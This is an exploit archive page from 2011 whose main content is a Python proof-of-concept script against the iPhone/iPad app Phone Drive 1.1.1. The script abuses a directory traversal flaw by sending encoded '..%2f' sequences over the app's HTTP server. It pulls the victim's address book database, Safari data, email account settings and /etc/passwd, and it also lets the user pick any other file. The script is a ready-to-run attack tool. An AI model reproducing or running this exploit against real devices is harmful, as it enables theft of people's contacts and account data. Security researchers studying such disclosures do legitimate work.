iPhone/iPad Phone Drive 1.1.1 Directory Traversal

iPhone/iPad Phone Drive 1.1.1 Directory Traversal: Posted Aug 9, 2011; Authored by IRCRASH, Khashayar Fereidani | Site ircrash.com; iPhone/iPad Phone Drive version 1.1.1 suffers from a directory traversal vulnerability.; tags | exploit, file inclusion; systems | apple, iphone; SHA-256 | 9ce0c276f2718f6d58f886cee41cf5f3c43da205d27b9901882eb2578567dd7f; Download | Favorite | View

iPhone/iPad Phone Drive 1.1.1 Directory Traversal

#!/usr/bin/python
#----------------------------------------------------------------
#Software : iPhone/iPad Phone Drive 1.1.1
#Type of vulnerability : Directory Traversal
#Tested On : iPhone 4 (IOS 4.3.3/Jailbroken)
#----------------------------------------------------------------
#Program Developer : http://ax.itunes.apple.com/app/id431033044?mt=8
#----------------------------------------------------------------
#Discovered by : Khashayar Fereidani
#Team Website : Http://IRCRASH.COM
#English Forums : Http://IRCRASH.COM/forums/
#Team Members : Khashayar Fereidani , Arash Allebrahim
#Email : irancrash [ a t ] gmail [ d o t ] com
#Facebook : http://facebook.com/fereidani
#Twitter : http://twitter.com/ircrash
#----------------------------------------------------------------
import urllib2
def urlread(url,file):
    url = url+"/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f"+file
    u = urllib2.urlopen(url)
    localFile = open('result.html', 'w')
    localFile.write(u.read())
    localFile.close()
    print "file saved as result.html\nIRCRASH.COM 2011"
print "----------------------------------------\n- iPhone/iPad Phone Drive 1.1.1 DT     -\n- Discovered by : Khashayar Fereidani  -\n- http://ircrash.com/                  -\n----------------------------------------"
url = raw_input("Enter Address ( Ex. : http://192.168.1.101:8080 ):")
f = ["","/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb","/private/var/mobile/Library/Safari","/private/var/mobile/Library/Preferences/com.apple.accountsettings.plist","/private/var/mobile/Library/Preferences/com.apple.conference.plist","/etc/passwd"]
print f[1]
id = int(raw_input("1 : Phone Book\n2 : Safari Fav\n3 : Users Email Info\n4 : Network Informations\n5 : Passwd File\n6 : Manual File Selection\n Enter ID:"))
if not('http:' in url):
    url='http://'+url
if ((id>0) and (id<6)):
    file=f[id]
    urlread(url,file)
if (id==6):
    file=raw_input("Enter Local File Address : ")
    urlread(url,file)

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

iPhone/iPad Phone Drive 1.1.1 Directory Traversal

iPhone/iPad Phone Drive 1.1.1 Directory Traversal

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

iPhone/iPad Phone Drive 1.1.1 Directory Traversal

Share This

iPhone/iPad Phone Drive 1.1.1 Directory Traversal

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems